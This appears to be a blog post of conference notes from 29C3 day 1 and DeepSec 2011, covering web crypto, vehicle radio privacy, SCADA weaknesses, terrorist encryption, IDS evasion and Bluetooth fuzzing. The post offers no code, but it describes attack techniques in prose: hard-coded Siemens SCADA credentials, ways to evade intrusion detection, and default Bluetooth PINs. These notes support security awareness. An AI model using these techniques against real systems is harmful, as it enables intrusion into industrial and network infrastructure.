Monday, December 31, 2012

Notes from 29th Chaos Communication Congress - day 1

See also day 2, day 3 and day 4.

Not my department



  • Called the US a totalitarian society / surveillance state

  • "Anonymity will buy you time, but it will not buy anyone justice."



ISP blackboxes


CMWP = CPE WAN management protocol: used to manage "CPEs" (Customer Premises Equipment = home router) by the ISP. Bidirectional SOAP/HTTP, the CPE connects to a configured server URL. Can read/modify configuration, reboot/reset/flash firmware.

New projects:

  • libfreecmwp / freecmwp: a client, intended for OpenWRT.

  • freeacs-ng: server; uses a separate "provisioning backend" connected through AMQP for the actual data.



Interestingly, configuring the CPE enough to be able to use IP/TCP/HTTP/SOAP and talk CMWP is out of scope of the standard.

Our daily job: hacking the law


A set of recommendations for lobbying:

  1. You need to have a clear goal.
  2. Be prepared [take a multi-year view, take advantage of opportunities].
  3. Frame your message well.
  4. Know what the legitimate interests of the opponent are.
  5. Stay focused.


Setting mobile phones free


Introduces a new Dutch mobile virtual operator. An interesting feature is the ability to route all incoming calls to customer's SIP server (=> the customer can direct them to the cell phone as usual, or do something else)

Most of the talk described various aspects of pricing throughout the network operator ecosystem. The only thing I found new was that incoming roaming calls may be more expensive than the EU-regulated maximal end-user price; some virtual operators thus simply don't provide this service.

As for wiretapping: the law requires wiretapping, but they were asked to sign a NDA before setting the wiretapping up. Because the law doesn't mandate any NDA, they refused to sign it, it's unclear how this will develop.

Re-igniting the Crypto Wars on the Web


An overly sensational headline for essentially an invitation to review the proposed W3C JavaScript crypto draft.

Trust assumptions: re: "JavaScript cryptography considered harmful", it is "essentially right given presuppositions": we still trust the server, CSRF is still a problem, yes, this doesn't fix it. Still, the proposal provides some otherwise impossible functionality (secure RNGs, constant-time operations, secure key storage...) right now. Also, "it's easy to seize client devices; server-based security ["in the cloud"] is not a terrible thing".



Currently there are ~30 open issues.



API design:



  • Originally started with a high-level idiot-proof API, but gave up on it for
    now as too difficult; so the current proposal is a low-level API
  • Old and broken algorithms are available for compatibility. We could
    exclude the currently broken algorithms, but once something is included now, it
    will be impossible to remove and it still can become broken later, so treating
    the currently broken algorithms as a special case is not that useful.
  • Provides asynchronous interface to crypto ops.
  • Haven't decided about key derivation design


Key storage: "as supercookies". Keys could be used for fingerprinting like cookies:


  • So, we want keys to be at least as safe as cookies
  • Also, we want to give the users a "clear keys" operation; therefore this is aimed at more or less ephemeral keys, (Long-term persistent keys are not the primary use case, multi-device key synchronization/management is out of scope.)


Privacy and the car of the future


Describes a "DSRT" (Digital Short-Range Communication) mechanism:


  • "short" = 380m;
  • Vehicle-to-vehicle communication: for safety
  • Vehicle-to-infrastructure communication as well (e.g. no red lights on an empty street)


"It already is happening":


  • Large-scale tests under way to quantify impact of the system on accidents.
  • All auto-makers are involved.
  • HW ready to ship, SW still being developed.
  • US dept. of transportation considering mandating this for new cars, German govt. considering infrastructure deployment


Overview:


  • Basic safety messages sent every 10 seconds; ~50 elements
  • Not a CANbus bridge
  • Radio: 5.9 GHz, 802.11p, fixed-length => "similar to slotted aloha"
  • Not an "automatic system"; only to warn drivers


Authentication: Everything is cryptographically signed, certs issued by a central authority based on "system fingerprint" (but without a paper trail to owner); on malfunction, the cert is revoked and system fingerprint is blacklisted => the radio unit needs to be replaced.

Privacy:


  • MAC layer: all-zero source address for vehicles (to reduce tracking) => protocol is unrouteable; making it routeable would require ID tracking.
  • Basic safety message: contains a "temporary ID" to allow contacting application; suggested creating an open source implementation to avoid broken implementations.
  • Certificates: identity vs. validity conflicts

    • For privacy, certificates with short validity and refreshed (X how often?
      We could instead pre-generate certs in advance, but that won't update the
      blacklist; updating the blacklist requires on-line connectivity anyway.)
    • Fingerprints hard-coded in the device "strongly discourage hacking"
      because of the cost of replacing, but it's difficult to ensure fingerprints won't
      be disclosed and tracked.
    • How to deliver certificates? Cell phone, wifi infrastructure contains source addresses. (The HW was shipped, even though this is still not resolved.)


  • The original proposal included road pricing / toll road integration, abandoned
    as incompatible with privacy.
  • Is it all worth the effort, when one can already identify the person using a cell phone?
  • "Worrisome noise" related to this:

    • Geo-targeted advertising and similar "funding" schemes.
    • "Data brokers" might be interested in running the fixed infrastructure
      to access data.
    • law enforcement: speed is broadcasted, correlating this with camera
      identification would be fairly easy (X that would hinder adoption)
      (the cameras can already identify a car, but to precisely measure speed
      the radar needs to be "calibrated" (?))



What can be done now:


  • Hack the radios (commercially available)
  • Hack the protocols (802.11p public)
  • Politically engage (US: nat. HW security administration; EU: ETSA); Decisions are mostly made by unelected standards bodies. Help them find funding without "selling out"


Insurance impact:


  • "Regulation will probably only allow rate reductions" based on this.
  • Insurers will want the data, but probably don't have the political power.
  • Car black boxes are already mandated in the US


Infrastructure-to-vehicle: Discussed in Europe for traffic management ("accident ahead" etc.) abandoned in US because of funding isues (little money for roads expected).

Security:


  • Nothing stops one from relaying a message to a different location
    (but the message contains location, so it isn't an attack); and this will be wanted for various statistics
  • Similarly, can replay an old message (but each message contains a GPS-originated time stamp)
  • "You can send all sort of funny stuff", e.g. fake sensor input
    "I don't like to talk too much about it, covered by NDA".
  • "Auto manufactures recognize CANbus is so insecure that they don't trust it" => DSRC would use a separate, independent control unit.

    • "I might believe they are ready to abandon CANbus".
    • "The real problem with CANbus are the weird extensions", like USA-mandated tire pressure sensors



SCADA strangelove


Europe is the region with most internet-exposed SCADA vulnerabilities; Italy the most vulnerable country (not sure why - perhaps highly industrialized country, wide deployment of smart grid).

Industrial users think SCADA are isolated networks, on special => "safe" platforms, but:

  • 100% of tested networks are (typically indirectly) exposed to internet.
  • 99% can be hacked with metasploit (some reboot on TCP connect scan)
  • 50% of "HMI" engineering stations are also used as desktops
  • Standard network protocols, standard OS, DPMs, apps, are used
    (typically Windows/SAL for SCADA, Linux/QNC for PLX)
    ... but no security; ICS experts don't view it as a computer system



ICS transports: Ethernet, GSM/GPRS, RS-232/485, Wifi, ZigBee, others.

Protocols:


  • Sniffing: Wireshark supports most it, some 3rd party protocol dissectors. Also industry-grade tools ("FTE NetDecoder").
  • Spoofing/Injection: Tools available for modbus; need to use generic tools (scapy) otherwise - but can just replay packets for most protocols.
  • Fingerprinting: Well-known ports used
  • Fuzzing: most devices will crash within a minute


PLC: "just a network device"


  • Finding vulnerabilities: Getting a PLC for a lab is difficult, but getting a firmware from the internet is easy.
  • Siemens S7 PLC: Found a hard-coded private "certification authority", apparently found also the private key.


SCADA: = network application connecting to PLCs, running on top of an OS/DBMS


  • => Not necessary to hack SCADA, can attack OS/DBMS. Typically has a restricted OS configuration (kiosk mode etc.) [e.g. PLC firmware updates have to be signed by a key on a HW token, but a PLC has a root/toor ssh account that bypasses this.]
  • WinCC: uses a database to store most information.

    • Had hard-coded passwords; noticed in 2005, abused by StuxNet in 2010, and fixed in 2010, but still works almost everywhere. [username/password was published on a Siemens forum :))]
    • MS SQL listening on the network (=> all security needs to reside in the DB, difficult to rework this design)
    • Inside the database: passwords are XORed using a fixed ASCII string

  • DiagAgent:

    • Not started by default, Siemens recommends not using it
    • No auth at all
    • XSS, path traversal, buffer overflows.

  • WebNavigator:

    • HMI tool as a web application
    • XPath injection, path traversals, ~20 instances of XSS... fixed now
    • XSS in HMI => can use operator's browser as a proxy to SCADA network
    • Looking at plugin lists, a lot of companies/companies/industries access the network using IE with HMI plugins... (was asked "how do I install Firefox on Windows 3? this IE won't run Facebook"). How to mitigate? "A guy with a gun standing behind the user is also a way to do risk management".



The authors released some SCADA tools:


  • ??? "dorks"?
  • Device scan/fingerprint tools for modbus and S7
  • metasploit module for WinCC
  • "SCADA Security Hardening Guide" published


Summary: There's lots of low-hanging fruit, it's scary.

Highlighted great experience with Siemens' security team: good cooperation, quick replies, even provided patches.

A lot of companies have no patch management, ("It's working, don't touch it")
=> need vendors to push customers ("Guys, you need to update to make it work").
Also, companies can't change things because it would break certification.

The worst thing they found: Windows 95, Windows 3.1
(typical situation: bought the system ages ago, got "spare parts" (=replacement
computers) in stock if they fail, have no idea how these things work or
what's in there)

A commenter noted that supposedly nuclear plants now use wifi instead of
Ethernet because Ethernet means validating "every meter" of the cable, whereas wifi works everywhere.

Notes from DeepSec 2011 day 1

(The DeepSec 2011 notes were apparently never finished, and I have just found this draft. Perhaps this might still be useful.)

Here are some notes from the first day of DeepSec 2011.

How Terrorists Encrypt


Historically, terrorism was used as a justification for restricting cryptography. This includes the original proposal for Clipper, and supposedly Al-Qaeda using steganography in "X-rated pictures" (tracked down to an unknown security company demonstrating steganography in Mona Lisa).

Actually, the 9/11 hijackers did not use encryption at all - just simple e-mails back and forth, with simple code word substitution.

Similarly, various Al-Qaeda manuals, if they deal with encryption at all, only describe simple monoalphabetic substitutions and using code names. A single operation used PGP competently, but only for local storage, not communication with other groups.

In practice, use of code names and "web mail dead drops" (sharing a webmail account name+password, and storing messages in the draft folder, to defeat traffic analysis) is frequent. A single "Islamic program for secure network communication" appeared on forums, with unknown provenance (an espionage "plant" suspected) - probably only a GUI for gpg.

The presentation continued with a large list of (UK-focused) counter-terrorism operations, with vast majority using no cryptography at all. If encryption for communication is used, it is trivial substitution. One case of using PGP, one case of using TrueCrypt - both within a small group of competent people, not used for communication.

There were some interesting notes about police handling of crypto - in one case a computer (and the forensic image?) was destroyed as a "biohazard"; in another case the UK government was able to find a PGP passphrase through an unknown method (the passphrase was not exactly, but "structurally similar to" "Bowl of SSSmile").

In summary:

  • Encryption is not used by terrorists for communication

  • They are concerned about traffic analysis

  • Some use encryption of personal data storage

  • Lessons from "Why Johnny doesn't encrypt" still apply: people are lazy, do it incorrectly, don't know how to tell good crypto from bad.



Reassemble or GTFO! - IDS Evasion Strategies


A general summary of issues with IDS systems.

Inherent issues:

  • Ambiguous RFCs

  • Inconsistencies on implementation reactions to input - an IDS needs to be like all implementations at the same time

  • Lack of resources/processing capacity

  • Lack of data to analyze

  • Complex protocols that cannot be understood form a single packet, e.g. MS RPC on port 135



Vendor behavior:

  • Vendors talk about throughput, not about detection: A typical IDS has a 5-10% detection rate when shipped. It can be tuned to 98% detection rate, but then it becomes really slow.

  • Most vendors import snort rules (they are available for free, so why write our own?)

  • Most vendors only inspect first ~300 bytes, to increase throughput

  • IDSes tend to fail open - perhaps set up as passive listeners, and don't want to bring the network down



Evasion methods:

  • Snort has a rule for detecting shellcode: "AAAAAAAAAA" and "CCCCCCC" (each with a different, carefully tuned length to balance detection with false positives)

    • Just use a different fill character to avoid detection

    • Append AAAAAAAAAAAA to the end of any request, the rule will be quickly turned off due to too many alarms

    • Or put AAAAAAA into an email signature...

    • "This is the level of sophistication we are dealing with."


  • For HTTP, use gzip compression and chunked transfer-encoding; the resulting packets don't have enough context to be decoded.

  • Cause the IDS and the final endpoint to receive different data:

    • Use an invalid IP checksum - IDS won't check it, and will accept the packet (but it's difficult to get such a packet past any internet router).

    • If the MTU in endpoint is larger than MTU of the IDS, set the DF flag.

    • Desynchronize TCP sequence number state: if the IDS uses a 3-way handshake, simulate it; if the IDS resynchronizes with any traffic, just send fake traffic.

    • Reassembly attacks, e.g. when fragments overlap, Windows always keeps old data, Unix always keeps new data.



Intelligent Bluetooth fuzzing - Why bother?


Presented results from various Bluetooth fuzzing attempts, on l2cap and above layers (= what is implemented in software). In carkit testing, 13/15 carkits were problematic, some required dealer service; 10 crashed even without pairing.

Typical "anomalies":

  • Length field over/underflows, especially in type-length-value structures, e.g. simply using length 0, 0xFFFF

  • In type-length-value structures, inconsistent length and NUL-termination (when both is required)

  • Data structure fuzzing, e.g. buffer overflows

  • Repeating valid data many times (overflows, resource exhaustion)

  • Flooding with a lot of valid data (no need to fuzz): especially for low-resource devices, e.g. headsets

  • Some multi-field anomalies (when more than one field is fuzzed at once)

  • Sending valid messages in incorrect sequence



Implementation notes:

  • Many profiles use AT commands or OBEX, but different profiles often have separate parsers, so the same input in different profiles has different results.

  • Typical defense focuses on preventing unauthorized access, not robustness.

  • "Anomalies" sometimes propagate to underlying systems (e.g. authentication servers on the network)

  • Some headsets die after an anomalous packet and never recover.

  • A lot of code sharing: the same vendor stack is used in various devices.



Some bluetooth security measures:

  • Pairing

    • Legacy mode is only a 4-digit code. Known values: 0000, 1234.

    • Can almost always connect via L2CAP to "PSM 1" without pairing (to make scanning possible).

    • The newer "simple secure pairing" mechanism can be downgraded to legacy mode

    • SSP "justworks" method does not require authentication; supposed to only allow host->client connections, but sometimes works the other way as well

    • Some devices stop requesting pairing after receiving anomalies


  • Non-discoverable mode: the device may still accept connections.



Why this works: "You are not supposed to do that" (and detecting a specific form of attack instead of fixing the cause), "It's not i the spec", "Why should anyone care if the cheap device breaks?" (but Bluetooth is becoming more critical - used in medical devices, e.g. insulin pumps), writing reliable core is difficult.